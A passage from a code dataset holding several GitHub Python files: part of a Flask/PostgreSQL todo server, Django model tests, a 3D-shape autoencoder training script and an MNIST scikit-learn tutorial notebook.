description,\n ]\n clauses = [\n 'summary = %s',\n 'description = %s',\n ]\n statement = 'UPDATE tasks SET ' + ', '.join(clauses) + ' WHERE id = %s'\n fields.append(task_id)\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(statement, fields)\n count = _update_count(cur.statusmessage)\n assert count in {0, 1}, count\n return count == 1\n \n def delete_task(self, task_id):\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute('DELETE FROM tasks WHERE id = %s', (task_id,))\n count = _delete_count(cur.statusmessage)\n assert count in {0, 1}, count\n return count == 1\n\n def all_tasks(self):\n cols = (\n 'id',\n 'summary',\n 'description',\n )\n select_stmt = 'select ' + ','.join(cols) + ' from tasks'\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(select_stmt)\n for row in cur:\n yield dict(zip(cols, row))\n\n def clear(self):\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute('DELETE FROM tasks')\n count = _delete_count(cur.statusmessage)\n return count\n\ndef _delete_count(statusmessage):\n match = re.match(r'DELETE (\\d+)$', statusmessage)\n assert match is not None, statusmessage\n return int(match.group(1))\n\ndef _update_count(statusmessage):\n match = re.match(r'UPDATE (\\d+)$', statusmessage)\n assert match is not None, statusmessage\n return int(match.group(1))\n\nDEFAULT_STORE = 'db'\nstore_types = {\n 'memory': MemoryTaskStore,\n 'db': DbTaskStore,\n}\nassert DEFAULT_STORE in store_types\nstore = store_types[DEFAULT_STORE]()\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', default=5000, type=int)\n parser.add_argument('--host', default='127.0.0.1', type=str)\n parser.add_argument('--store', default=DEFAULT_STORE, choices=store_types.keys(),\n help='storage backend')\n parser.add_argument('--debug', action='store_true', default=False)\n return parser.parse_args()\n\n\ndef init_store(store_type_name):\n global store\n store_type = store_types[store_type_name]\n store = store_type()\n \n@app.route('/tasks/', methods=['GET'])\ndef get_tasks():\n return json.dumps([\n {'id': task['id'], 'summary': task['summary']}\n for task in store.all_tasks()])\n\n@app.route('/tasks//', methods=['GET'])\ndef describe_task(task_id):\n task = store.get_task(task_id)\n if task is None:\n return make_response('', 404)\n return json.dumps(task)\n\n@app.route('/tasks/', methods=['POST'])\ndef add_task():\n data = request.get_json()\n task_id = store.add(data['summary'], data['description'])\n return make_response(json.dumps({'id': task_id}), 201)\n\n@app.route('/tasks/ALL/', methods=['DELETE'])\ndef wipe_tasks():\n deleted = store.clear()\n return make_response(json.dumps({'deleted': deleted}), 200)\n \n@app.route('/tasks//', methods=['DELETE'])\ndef task_done(task_id):\n did_exist = store.delete_task(task_id)\n if did_exist:\n return ''\n return make_response('', 404)\n\n@app.route('/tasks//', methods=['PUT'])\ndef update_task(task_id):\n data = request.get_json()\n did_update = store.update_task(task_id, data['summary'], data['description'])\n if did_update:\n return ''\n return make_response('', 404)\n\nif __name__ == '__main__':\n args = get_args()\n if args.store == 'memory':\n init_store(args.store)\n if args.debug:\n app.debug = True\n app.run(host=args.host, 
port=args.port)\n","repo_name":"redsymbol/todo-server","sub_path":"src/todoserver.py","file_name":"todoserver.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10379748363","text":"from django.test import TestCase\nfrom question.models import Question,Choices,Topics,Embeds\nfrom datetime import datetime, date\n# Create your tests here.\n\nclass QuestionTestCase(TestCase):\n def setUp(self):\n topics = []\n topics.append(Topics(t_id=1, body=\"topic_1\"))\n \n choices = []\n choices.append(Choices(c_id=0, body=\"choice_1\", pos =\"NONE\", iscorrect=False))\n\n embeds=[]\n embeds.append(Embeds(e_id=0,body=\"embed_1\"))\n\n Question.objects.create(q_id= \"1\",\n body=\"test_question1_body\",\n parent=\"0\",\n ask_date= date(2007, 12, 5) ,\n topics = topics,\n embeds = embeds,\n choices = choices\n )\n\n def test_Question(self):\n \"\"\"test_Question\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n self.assertEqual(q.body, 'test_question1_body')\n self.assertEqual(q.parent, '0')\n self.assertEqual(q.ask_date, date(2007, 12, 5))\n self.assertEqual(q.topics[0].body, \"topic_1\" )\n self.assertEqual(q.embeds[0].body, \"embed_1\" )\n self.assertEqual(q.choices[0].body, \"choice_1\" )\n self.assertEqual(q.choices[0].c_id, 0 )\n self.assertEqual(q.choices[0].pos, \"NONE\" )\n self.assertEqual(q.choices[0].iscorrect, False )\n\n def test_updateParent(self):\n \"\"\"test_updateParent\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateParent(5)\n self.assertEqual(q.parent, 5)\n\n def test_updateAskDate(self):\n \"\"\"test_updateAskDate\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateAskDate(\"2020.1.1\")\n self.assertEqual(q.ask_date,\"2020.1.1\")\n\n def test_addEmbed(self):\n \"\"\"test_addEmbed\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.addEmbed(\"embed_2\")\n self.assertEqual(q.embeds[1].body, \"embed_2\")\n\n def test_addTopic(self):\n \"\"\"test_addTopic\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.addTopic(\"topic_2\")\n self.assertEqual(q.topics[1].body, \"topic_2\")\n\n def test_addChoice(self):\n \"\"\"test_addChoice\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.addChoice(\"choice_2\",str(True),\"START\")\n self.assertEqual(q.choices[1].body, \"choice_2\")\n self.assertEqual(q.choices[1].pos, \"START\")\n self.assertEqual(q.choices[1].iscorrect, True)\n\n def test_updateBody(self):\n \"\"\"test_updateBody\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateBody(\"body_2\")\n self.assertEqual(q.body, \"body_2\")\n\n def test_updateEmbed(self):\n \"\"\"test_updateEmbed\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateEmbed(0,\"embed_0\")\n self.assertEqual(q.embeds[0].body, \"embed_0\")\n\n def test_updateTopic(self):\n \"\"\"test_updateTopic\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateTopic(1,\"topic_0\")\n self.assertEqual(q.topics[0].body, \"topic_0\")\n\n def test_updateChoice(self):\n \"\"\"test_updateChoice\"\"\"\n\n q = Question.objects.get(q_id = \"1\")\n q.updateChoice(0, \"new_choice\", str(True), \"END\")\n self.assertEqual(q.choices[0].body, \"new_choice\")\n self.assertEqual(q.choices[0].pos, \"END\")\n self.assertEqual(q.choices[0].iscorrect, True)\n\n def test_delEmbed(self):\n \"\"\"test_delEmbed\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n q.delEmbed(0)\n self.assertEqual(q.embeds,[])\n\n def test_delTopic(self):\n \"\"\"test_delTopic\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n q.delTopic(1)\n 
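# The Flask routes in the todoserver module above form a small CRUD API; a
# hedged client-side walk-through using requests (host/port taken from the
# script's defaults, payload values illustrative only):
import requests
base = 'http://127.0.0.1:5000'
r = requests.post(base + '/tasks/', json={'summary': 's', 'description': 'd'})
task_id = r.json()['id']                                  # 201 + {'id': ...}
print(requests.get('{}/tasks/{}/'.format(base, task_id)).json())
requests.put('{}/tasks/{}/'.format(base, task_id),
             json={'summary': 's2', 'description': 'd2'})
requests.delete('{}/tasks/{}/'.format(base, task_id))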
self.assertEqual(q.topics,[])\n\n def test_delChoice(self):\n \"\"\"test_delChoice\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n q.delChoice(0)\n self.assertEqual(q.choices,[])\n\n def test_copyQuestion(self):\n \"\"\"test_copyQuestion\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n new_q = q.copyQuestion()\n self.assertEqual(new_q.body, 'test_question1_body')\n self.assertEqual(new_q.parent, '1')\n self.assertEqual(new_q.topics[0].body, \"topic_1\" )\n self.assertEqual(new_q.embeds[0].body, \"embed_1\" )\n self.assertEqual(new_q.choices[0].body, \"choice_1\" )\n self.assertEqual(new_q.choices[0].c_id, 0 )\n self.assertEqual(new_q.choices[0].pos, \"NONE\" )\n self.assertEqual(new_q.choices[0].iscorrect, False )","repo_name":"KYurtseven/METU_Homeworks","sub_path":"445 - Script/phase4/src/question/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20422034782","text":"import os\nimport os.path as osp\nimport logging\nimport argparse\nfrom tqdm import tqdm\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nimport numpy as np\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport torch\nfrom torch.optim import lr_scheduler\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\n\nfrom utils import helper\nfrom utils import visualization\n\nfrom networks import autoencoder\n\nfrom dataset import shapenet_dataset\n###################################### Experiment Utils########################################################\n\n\ndef experiment_name(args):\n\n from datetime import datetime\n\n tokens = [\"Autoencoder\", args.dataset_name, args.input_type, args.output_type, args.emb_dims, args.last_feature_transform]\n \n if args.categories != None:\n for i in args.categories:\n tokens.append(i)\n \n if args.num_sdf_points != 5000:\n tokens.append(args.num_sdf_points)\n \n tokens.append(args.seed)\n return \"_\".join(map(str, tokens))\n\ndef bool_flag(s):\n \"\"\"\n Parse boolean arguments from the command line.\n \"\"\"\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")\n \ndef compute_iou(occ1, occ2):\n ''' Computes the Intersection over Union (IoU) value for two sets of\n occupancy values.\n Args:\n occ1 (tensor): first set of occupancy values\n occ2 (tensor): second set of occupancy values\n '''\n occ1 = np.asarray(occ1)\n occ2 = np.asarray(occ2)\n\n # Put all data in second dimension\n # Also works for 1-dimensional data\n if occ1.ndim >= 2:\n occ1 = occ1.reshape(occ1.shape[0], -1)\n if occ2.ndim >= 2:\n occ2 = occ2.reshape(occ2.shape[0], -1)\n\n # Convert to boolean values\n occ1 = (occ1 >= 0.5)\n occ2 = (occ2 >= 0.5)\n\n # Compute IOU\n area_union = (occ1 | occ2).astype(np.float32).sum(axis=-1)\n area_intersect = (occ1 & occ2).astype(np.float32).sum(axis=-1)\n\n iou = (area_intersect / area_union)\n\n return iou\n\n###################################### Experiment Utils########################################################\n\n############################################# data loader #################################################\n\ndef get_dataloader(args, split=\"train\"):\n \n if args.dataset_name == \"Shapenet\":\n pointcloud_field = 
shapenet_dataset.PointCloudField(\"pointcloud.npz\")\n points_field = shapenet_dataset.PointsField(\"points.npz\",unpackbits=True)\n voxel_fields = shapenet_dataset.VoxelsField(\"model.binvox\")\n\n fields = {}\n\n fields['pointcloud'] = pointcloud_field\n fields['points'] = points_field\n fields['voxels'] = voxel_fields\n\n if split == \"train\":\n dataset = shapenet_dataset.Shapes3dDataset(args.dataset_path, fields, split=split,\n categories=args.categories, no_except=True, transform=None, num_points=args.num_points, num_sdf_points=args.num_sdf_points, sampling_type=args.sampling_type)\n\n dataloader = DataLoader(dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, drop_last=True)\n total_shapes = len(dataset)\n else:\n dataset = shapenet_dataset.Shapes3dDataset(args.dataset_path, fields, split=split,\n categories=args.categories, no_except=True, transform=None, num_points=args.num_points, num_sdf_points=args.test_num_sdf_points, sampling_type=args.sampling_type)\n dataloader = DataLoader(dataset, batch_size=args.test_batch_size, shuffle=True, num_workers=args.num_workers, drop_last=False)\n total_shapes = len(dataset)\n return dataloader, total_shapes \n \n \n else:\n raise ValueError(\"Dataset name is not defined {}\".format(args.dataset_name))\n\n############################################# data loader #################################################\n\n\n############################## visualization #################################################\n\ndef visualization_model(model, args, test_dataloader, name_info):\n model.eval()\n test_loader = iter(test_dataloader)\n data = next(test_loader)\n \n \n if args.input_type == \"Voxel\":\n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n elif args.input_type == \"Pointcloud\":\n data_input = data['pc_org'].type(torch.FloatTensor).to(args.device).transpose(-1, 1)\n\n if args.output_type == \"Implicit\":\n voxel_32 = data['voxels'].type(torch.FloatTensor).to(args.device)\n voxel_size = 32\n shape = (voxel_size, voxel_size, voxel_size)\n p = 1.1 * visualization.make_3d_grid([-0.5] * 3, [+0.5] * 3, shape).type(torch.FloatTensor).to(args.device)\n query_points = p.expand(args.test_batch_size, *p.size())\n elif args.output_type == \"Pointcloud\":\n query_points = None\n gt = data['pc_org'].type(torch.FloatTensor).to(args.device) \n \n \n with torch.no_grad():\n pred, decoder_embs = model(data_input, query_points)\n \n if name_info is not None:\n save_loc = args.vis_dir + \"/\" + str(name_info) + \"_\" \n else:\n save_loc = args.vis_dir + \"/\"\n \n if args.output_type == \"Implicit\":\n voxels_out = (pred[0].view(voxel_size, voxel_size, voxel_size) > args.threshold).detach().cpu().numpy()\n real = voxel_32[0].detach().cpu().numpy()\n visualization.multiple_plot_voxel([real, voxels_out], save_loc=save_loc + \"real_pred.png\")\n #visualization.save_mesh(voxels_out, out_file=save_loc + \"pred.obj\")\n elif args.output_type == \"Pointcloud\":\n visualization.plot_real_pred(gt.detach().cpu().numpy(), pred.detach().cpu().numpy(), 1, save_loc=save_loc + \"real_pred.png\") \n \n############################## visualization #################################################\n \n############################## validation #################################################\n\ndef val_one_epoch_iou(model, args, test_dataloader, epoch):\n model.eval()\n loss_reconstruction = []\n points_voxels = visualization.make_3d_grid(\n (-0.5 + 1/64,) * 3, (0.5 - 1/64,) * 3, (32,) * 
3).type(torch.FloatTensor).to(args.device)\n query_points = points_voxels.expand(args.test_batch_size, *points_voxels.size())\n \n with torch.no_grad():\n for data in test_dataloader:\n \n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n \n voxels_occ_np = (data['voxels'] >= 0.5).cpu().numpy() \n \n if args.test_batch_size != data_input.size(0):\n query_points = points_voxels.expand( data_input.size(0), *points_voxels.size())\n \n pred, _ = model(data_input, query_points)\n \n occ_hat_np = (pred >= args.threshold).cpu().numpy()\n \n iou_voxels = compute_iou(voxels_occ_np, occ_hat_np).mean()\n\n loss_reconstruction.append(iou_voxels.item())\n \n loss_reconstruction = np.asarray(loss_reconstruction)\n loss_reconstruction = np.mean(loss_reconstruction)\n logging.info(\"[Val] Epoch {} IOU Loss: {}\".format(epoch, loss_reconstruction))\n return loss_reconstruction \n\ndef val_one_epoch(model, args, test_dataloader, epoch):\n model.eval()\n loss_reconstruction = []\n\n with torch.no_grad():\n for data in test_dataloader:\n \n if args.input_type == \"Voxel\":\n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n elif args.input_type == \"Pointcloud\":\n data_input = data['pc_org'].type(torch.FloatTensor).to(args.device).transpose(-1, 1)\n\n if args.output_type == \"Implicit\":\n query_points, occ = data['points'], data['points.occ']\n query_points = query_points.type(torch.FloatTensor).to(args.device)\n occ = occ.type(torch.FloatTensor).to(args.device)\n gt = occ \n elif args.output_type == \"Pointcloud\":\n query_points = None\n gt = data['pc_org'].type(torch.FloatTensor).to(args.device) \n \n pred, _ = model(data_input, query_points)\n loss_reconstuct = model.reconstruction_loss(pred, gt)\n\n loss_reconstruction.append(loss_reconstuct.item())\n \n loss_reconstruction = np.asarray(loss_reconstruction)\n loss_reconstruction = np.mean(loss_reconstruction)\n logging.info(\"[Val] Epoch {} Loss: {}\".format(epoch, loss_reconstruction))\n return loss_reconstruction \n\n############################## validation #################################################\n\n############################## training #################################################\n\ndef train_one_epoch(model, args, train_dataloader, optimizer, scheduler, loss_meter, epoch):\n model.train()\n loss_reconstruction = [] \n iteration = 0\n for data in train_dataloader:\n iteration = iteration + 1\n optimizer.zero_grad()\n\n data_index = data['idx'].to(args.device)\n \n if args.input_type == \"Voxel\":\n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n elif args.input_type == \"Pointcloud\":\n data_input = data['pc_org'].type(torch.FloatTensor).to(args.device).transpose(-1, 1)\n \n if args.output_type == \"Implicit\":\n query_points, occ = data['points'], data['points.occ']\n query_points = query_points.type(torch.FloatTensor).to(args.device)\n occ = occ.type(torch.FloatTensor).to(args.device)\n gt = occ \n elif args.output_type == \"Pointcloud\":\n query_points = None\n gt = data['pc_org'].type(torch.FloatTensor).to(args.device) \n \n pred, shape_embs = model(data_input, query_points)\n\n loss_reconstuct = model.reconstruction_loss(pred, gt)\n \n loss = loss_reconstuct \n loss.backward()\n optimizer.step()\n loss_meter.update(loss, data_input.size(0))\n \n loss_reconstruction.append(loss_reconstuct.item())\n \n if iteration % args.print_every == 0:\n avg_reconstruction_loss = np.mean(np.asarray(loss_reconstruction))\n \n logging.info(\"[Train] Epoch {}, Iteration {} loss: {}, 
recon loss: {}\".format(epoch, iteration, loss_meter.avg, avg_reconstruction_loss))\n\n############################## training ################################################# \n\ndef parsing(mode=\"args\"):\n parser = argparse.ArgumentParser()\n \n ### Sub Network details\n parser.add_argument(\"--input_type\", type=str, default='Voxel', help='What is the input representation')\n parser.add_argument(\"--output_type\", type=str, default='Implicit', help='What is the output representation')\n parser.add_argument(\"--encoder_type\", type=str, default='Voxel_Encoder_BN', help='what is the encoder')\n parser.add_argument(\"--decoder_type\", type=str, default='Occ_Simple_Decoder', help='what is the decoder')\n parser.add_argument('--emb_dims', type=int, default=128, help='Dimension of embedding')\n parser.add_argument('--last_feature_transform', type=str, default=\"add_noise\", help='add_noise or none')\n parser.add_argument('--reconstruct_loss_type', type=str, default=\"sum\", help='bce or sum (mse) or mean (mse)')\n parser.add_argument('--pc_dims', type=int, default=1024, help='Dimension of embedding')\n \n ### Dataset details\n parser.add_argument('--dataset_path', type=str, default=None, help='Dataset path')\n parser.add_argument('--dataset_name', type=str, default=\"Shapenet\", help='Dataset path')\n parser.add_argument(\"--num_points\", type=int, default=2025, help='Number of points')\n parser.add_argument(\"--num_sdf_points\", type=int, default=5000, help='Number of points')\n parser.add_argument(\"--test_num_sdf_points\", type=int, default=30000, help='Number of points')\n parser.add_argument('--categories', nargs='+', default=None, metavar='N')\n parser.add_argument(\"--num_workers\", type=int, default=4, help='Number of workers') \n \n ### training details\n parser.add_argument('--train_mode', type=str, default=\"train\", help='train or test')\n parser.add_argument('--seed', type=int, default=1, help='Seed')\n parser.add_argument('--epochs', type=int, default=300, help=\"Total epochs\")\n parser.add_argument('--checkpoint', type=str, default=None, help=\"Checkpoint to load\")\n parser.add_argument('--use_timestamp', action='store_true', help='Whether to use timestamp in dump files')\n parser.add_argument('--num_iterations', type=int, default=300000, help='How long the training shoulf go on') \n parser.add_argument('--gpu', nargs='+' , default=\"0\", help='GPU list')\n parser.add_argument('--optimizer', type=str, choices=('SGD', 'Adam'), default='Adam')\n parser.add_argument('--lr', type=float, default=None)\n parser.add_argument('--batch_size', type=int, default=32, help='Dimension of embedding')\n parser.add_argument('--test_batch_size', type=int, default=32, help='Dimension of embedding')\n parser.add_argument('--threshold', type=float, default=0.05, help='Threshold for voxel stuff')\n parser.add_argument('--sampling_type', type=str, default=None, help='what sampling type: None--> Uniform')\n \n ### Logging details \n parser.add_argument('--print_every', type=int, default=50, help='Printing the loss every')\n parser.add_argument('--save_every', type=int, default=50, help='Saving the model every')\n parser.add_argument('--validation_every', type=int, default=5000, help='validation set every')\n parser.add_argument('--visualization_every', type=int, default=10, help='visualization of the results every')\n parser.add_argument(\"--log-level\", type=str, choices=('info', 'warn', 'error'), default='info')\n parser.add_argument('--experiment_type', type=str, default=\"max\", 
help='experiment type')\n parser.add_argument('--experiment_every', type=int, default=5, help='experiment every ')\n \n if mode == \"args\":\n args = parser.parse_args()\n return args\n else:\n return parser\n\n\ndef main():\n args = parsing()\n exp_name = experiment_name(args)\n \n manualSeed = args.seed\n helper.set_seed(manualSeed)\n\n # Create directories for checkpoints and logging\n args.experiment_dir = osp.join('exps', exp_name)\n args.checkpoint_dir = osp.join('exps', exp_name, 'checkpoints')\n args.vis_dir = osp.join('exps', exp_name, 'vis_dir') + \"/\"\n args.generate_dir = osp.join('exps', exp_name, 'generate_dir') + \"/\" \n \n \n if args.train_mode != \"test\":\n log_filename = osp.join('exps', exp_name, 'log.txt')\n helper.create_dir(args.experiment_dir)\n helper.create_dir(args.checkpoint_dir)\n helper.create_dir(args.vis_dir)\n helper.create_dir(args.generate_dir)\n helper.setup_logging(log_filename, args.log_level, 'w')\n else:\n test_log_filename = osp.join('exps', exp_name, 'test_log.txt')\n helper.setup_logging(test_log_filename, args.log_level, 'w')\n args.examplar_generate_dir = osp.join('exps', exp_name, 'exam_generate_dir') + \"/\" \n helper.create_dir(args.examplar_generate_dir)\n args.vis_gen_dir = osp.join('exps', exp_name, 'vis_gen_dir') + \"/\" \n helper.create_dir(args.vis_gen_dir)\n \n \n \n logging.info(\"Experiment name: {}\".format(exp_name))\n logging.info(\"{}\".format(args))\n\n device, gpu_array = helper.get_device(args)\n args.device = device \n \n logging.info(\"#############################\")\n train_dataloader, total_shapes = get_dataloader(args, split=\"train\")\n args.total_shapes = total_shapes\n logging.info(\"Train Dataset size: {}\".format(total_shapes))\n test_dataloader, total_shapes_test = get_dataloader(args, split=\"val\")\n logging.info(\"Test Dataset size: {}\".format(total_shapes_test))\n logging.info(\"#############################\")\n \n #####\n net = autoencoder.get_model(args).to(args.device)\n print(net)\n logging.info(\"#############################\")\n \n if args.train_mode == \"test\":\n print(\"Test mode \")\n print(\"Loading model....\", args.checkpoint)\n checkpoint = torch.load(args.checkpoint_dir +\"/\"+ args.checkpoint +\".pt\")\n net.load_state_dict(checkpoint['model'])\n\n full_test_dataloader, total_shapes_test = get_dataloader(args, split=\"test\")\n logging.info(\"Test Dataset size: {}\".format(total_shapes_test))\n \n if args.output_type == \"Implicit\":\n test_iou = val_one_epoch_iou(net, args, full_test_dataloader, 0)\n logging.info(\"Test iou {}\".format(test_iou))\n elif args.output_type == \"Pointcloud\":\n test_val = val_one_epoch(net, args, full_test_dataloader, 0)\n logging.info(\"Test val loss {}\".format(test_val))\n \n else:\n optimizer = helper.get_optimizer_model(args.optimizer, net, lr=args.lr)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, args.num_iterations, 0.000001)\n\n start_epoch = 0 \n if args.checkpoint != None:\n print(\"Loading model....\", args.checkpoint)\n checkpoint = torch.load(args.checkpoint_dir +\"/\"+ args.checkpoint +\".pt\")\n net.load_state_dict(checkpoint['model'])\n\n optimizer.load_state_dict(checkpoint['optimizer'])\n scheduler.load_state_dict(checkpoint['scheduler'])\n start_epoch = checkpoint['current_epoch']\n \n\n best_loss = 100000 \n best_iou = 0\n best_32_loss = 100000\n\n for epoch in range(start_epoch, args.epochs):\n loss_meter = helper.AverageMeter()\n logging.info(\"#############################\")\n #val_iou = val_one_epoch_iou(net, args, 
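# A hypothetical command line for this training script (flag names come from
# parsing() above; the dataset path and values are illustrative only):
#   python train_autoencoder.py --dataset_path /path/to/ShapeNet \
#       --input_type Voxel --output_type Implicit \
#       --batch_size 32 --lr 0.0001 --gpu 0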
test_dataloader, epoch)\n train_one_epoch(net, args, train_dataloader, optimizer, scheduler, loss_meter, epoch)\n \n if (epoch + 1) % 5 == 0: # visualize every 5 epochs\n visualization_model(net, args, test_dataloader, epoch)\n \n if args.output_type == \"Implicit\":\n val_iou = val_one_epoch_iou(net, args, test_dataloader, epoch)\n if best_iou < val_iou:\n best_iou = val_iou\n filename = '{}.pt'.format(\"best_iou\")\n logging.info(\"Saving Model........{}\".format(filename))\n helper.save_checkpoint(osp.join(args.checkpoint_dir, filename), net, args, optimizer, scheduler, epoch)\n elif args.output_type == \"Pointcloud\":\n val_loss = val_one_epoch(net, args, test_dataloader, epoch)\n if best_loss > val_loss:\n best_loss = val_loss\n filename = '{}.pt'.format(\"best\")\n logging.info(\"Saving Model........{}\".format(filename))\n helper.save_checkpoint(osp.join(args.checkpoint_dir, filename), net, args, optimizer, scheduler, epoch)\n\n filename = '{}.pt'.format(\"last\")\n logging.info(\"Saving Model........{}\".format(filename))\n helper.save_checkpoint(osp.join(args.checkpoint_dir, filename), net, args, optimizer, scheduler, epoch)\n\n\nif __name__ == \"__main__\":\n main() \n ","repo_name":"AutodeskAILab/Clip-Forge","sub_path":"train_autoencoder.py","file_name":"train_autoencoder.py","file_ext":"py","file_size_in_byte":19743,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"}
{"seq_id":"42592162011","text":"#%%\nfrom sklearn.datasets import fetch_mldata # NOTE: removed from recent scikit-learn; fetch_openml('mnist_784') is the modern replacement\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nmnist = fetch_mldata('MNIST original')\nX, y = mnist['data'], mnist['target']\n\nsome_digit = X[36000]\nsome_digit_image = some_digit.reshape(28, 28)\nplt.imshow(some_digit_image, cmap=plt.cm.binary, interpolation=\"nearest\")\nplt.axis('off')\nplt.show()\n\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\n\n# shuffle training set\nshuffle_index = np.random.permutation(60000)\nX_train, y_train = X_train[shuffle_index], y_train[shuffle_index]\n\n\n#%%\nfrom sklearn.linear_model import SGDClassifier\n\n# train a binary \"5\" classifier\ny_train_5 = (y_train == 5)\ny_test_5 = (y_test == 5)\nsgd_clf = SGDClassifier(random_state=42)\nsgd_clf.fit(X_train, y_train_5)\nsgd_clf.predict([some_digit])\n\n#%%\n# evaluate the model\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\n\ncross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\n\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)\nconfusion_matrix(y_train_5, y_train_pred)\nf1_score(y_train_5, y_train_pred)\n\n#%%\n# play with precision and recall\nfrom sklearn.metrics import precision_recall_curve\n\ny_scores = cross_val_predict(\n sgd_clf, X_train, y_train_5, cv=3, method='decision_function')\n\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\n plt.xlabel(\"Threshold\")\n plt.legend(loc=\"upper left\")\n plt.ylim([0, 1])\n\n\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\nplt.show()\n\n#%%\n# roc curve\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n\nfpr, tpr, thresholds = roc_curve(y_train_5,
y_scores)\n\n\ndef plot_roc_curve(fpr, tpr, label=None):\n plt.plot(fpr, tpr, linewidth=2, label=label)\n plt.plot([0, 1], [0, 1], \"k--\")\n plt.axis([0, 1, 0, 1])\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n\n\nplot_roc_curve(fpr, tpr)\nplt.show()\n\nroc_auc_score(y_train_5, y_scores)\n\n#%%\n# try random forest classifier and compare roc with sgd\nfrom sklearn.ensemble import RandomForestClassifier\n\nforest_clf = RandomForestClassifier(random_state=42)\ny_probas_forest = cross_val_predict(\n forest_clf, X_train, y_train_5, cv=3, method='predict_proba')\n\ny_scores_forest = y_probas_forest[:, 1] # score = proba of positive class\nfpr_forest, tpr_forest, thresholds_forest = roc_curve(\n y_train_5, y_scores_forest)\n\nplt.plot(fpr, tpr, \"b:\", label='SGD')\nplot_roc_curve(fpr_forest, tpr_forest, \"Random Forest\")\nplt.legend(loc=\"lower right\")\n\nroc_auc_score(y_train_5, y_scores_forest)\n\n#%% multiclass classifier\nfrom sklearn.preprocessing import StandardScaler\n\nsgd_clf.fit(X_train, y_train)\nsgd_clf.predict([some_digit])\n\ncross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\n\n# scale features and re-evaluate\nscaler = StandardScaler()\nX_train_scaled = scaler.fit_transform(X_train.astype(np.float64))\ncross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring=\"accuracy\")\n\n#%%\n# error analysis\ny_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)\nconf_mx = confusion_matrix(y_train, y_train_pred)\nplt.matshow(conf_mx, cmap=plt.cm.gray)\n\nrow_sums = conf_mx.sum(axis=1, keepdims=True)\nnorm_conf_mx = conf_mx / row_sums\nnp.fill_diagonal(norm_conf_mx, 0)\nplt.matshow(norm_conf_mx, cmap=plt.cm.gray)\n\n#%%\n# multilabel classification\nfrom sklearn.neighbors import KNeighborsClassifier\n\ny_train_large = (y_train >= 7)\ny_train_odd = (y_train % 2 == 1)\ny_multilabel = np.c_[y_train_large, y_train_odd]\n\nknn_clf = KNeighborsClassifier()\nknn_clf.fit(X_train, y_multilabel)\n\nknn_clf.predict([some_digit])\ny_train_knn_pred = cross_val_predict(knn_clf, X_train, y_train, cv=3)\nf1_score(y_train, y_train_knn_pred, average='macro')\n\n#%%\n# multioutput classification\nnoise = np.random.randint(0, 100, (len(X_train), 784))\nX_train_mod = X_train + noise\nnoise = np.random.randint(0, 100, (len(X_test), 784))\nX_test_mod = X_test + noise\ny_train_mod = X_train\ny_test_mod = X_test\n\nknn_clf.fit(X_train_mod, y_train_mod)\nclean_digit = knn_clf.predict([X_test_mod[3450]])\n\n\ndef plot_digit(data):\n image = data.reshape(28, 28)\n plt.imshow(image, cmap=matplotlib.cm.binary,\n interpolation=\"nearest\")\n plt.axis(\"off\")\n\n\nplot_digit(clean_digit)\n\n#%%\n# Exercise 1\nfrom sklearn.neighbors import 